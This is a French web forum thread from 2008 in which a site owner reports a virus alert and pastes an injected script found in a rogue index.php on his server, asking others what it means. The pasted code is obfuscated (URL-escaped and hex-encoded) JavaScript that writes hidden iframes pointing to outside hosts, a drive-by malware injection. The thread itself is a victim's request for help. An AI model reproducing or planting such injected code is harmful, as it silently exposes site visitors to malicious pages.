on me signale sur un des sites dont je m'occupe qu'à l'entrée sur le dit site une alerte virus se déclenche. Je suis sur mac et je n'ai rien vu. Je suis donc allé voir sur le serveur et je trouve une page nommée "index.php" alors que je l'avait faite en html !!!!!!!!!! Dans cette page, ce script :
Code:
<script>document.write(unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%69%6d%70%75%6c%73%65%39%2e%6f%72%67%2f%27%20%77%69%64%74%68%3d%27%31%27%20%68%65%69%67%68%74%3d%27%31%27%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%20%68%69%64%64%65%6e%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e'));</script><script>function v47cedbfd45dca(v47cedbfd46d6a){ function v47cedbfd47d0a () {var v47cedbfd48ca8=16; return v47cedbfd48ca8;} return(parseInt(v47cedbfd46d6a,v47cedbfd47d0a()));}function v47cedbfd49c4a(v47cedbfd4abea){ var v47cedbfd4bb89='';for(v47cedbfd4cb2a=0; v47cedbfd4cb2a<v47cedbfd4abea.length; v47cedbfd4cb2a+=2){ v47cedbfd4bb89+=(String.fromCharCode(v47cedbfd45dca(v47cedbfd4abea.substr(v47cedbfd4cb2a, 2))));}return v47cedbfd4bb89;} document.write(v47cedbfd49c4a('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D61376530656630393031207372633D5C27687474703A2F2F75726C2F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313434303138292B27356461613566396530635C272077696474683D333831206865696768743D333738207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
Je ne sais pas ce qu'il veut dire. Quelqu'un sait? Dans le doute, j'ai supprimé cette page mais je dois savoir ce que ça a fait et si je dois controler régulièrement.
Merci beaucoup pour votre aide @+ Fred
PS : Désolé mais le code déforme la page, je ne le coupe pas car j'ai peur que ça nuise à sa lisibilité. Mais si je dois le faire, je le fais ;-)
« Dernière Édition: le 30-07-2008 a 21:03:39 par r2ek »
je n'entrave rien à ce code. En fait, je soupçonne un piratage. Tu n'as pas une idée de ce que ce code veut bien vouloir dire même avec l'erreur? Penses tu que ça puisse être du hacking?
Tu vois quelque chose? Pourquoi mon serveur viendrait faire des codes que je n'ai pas autorisé, surtout si ils ne veulent rien dire? Il est fou? A moins que ce ne soit l'hébergeur?
Auteur 
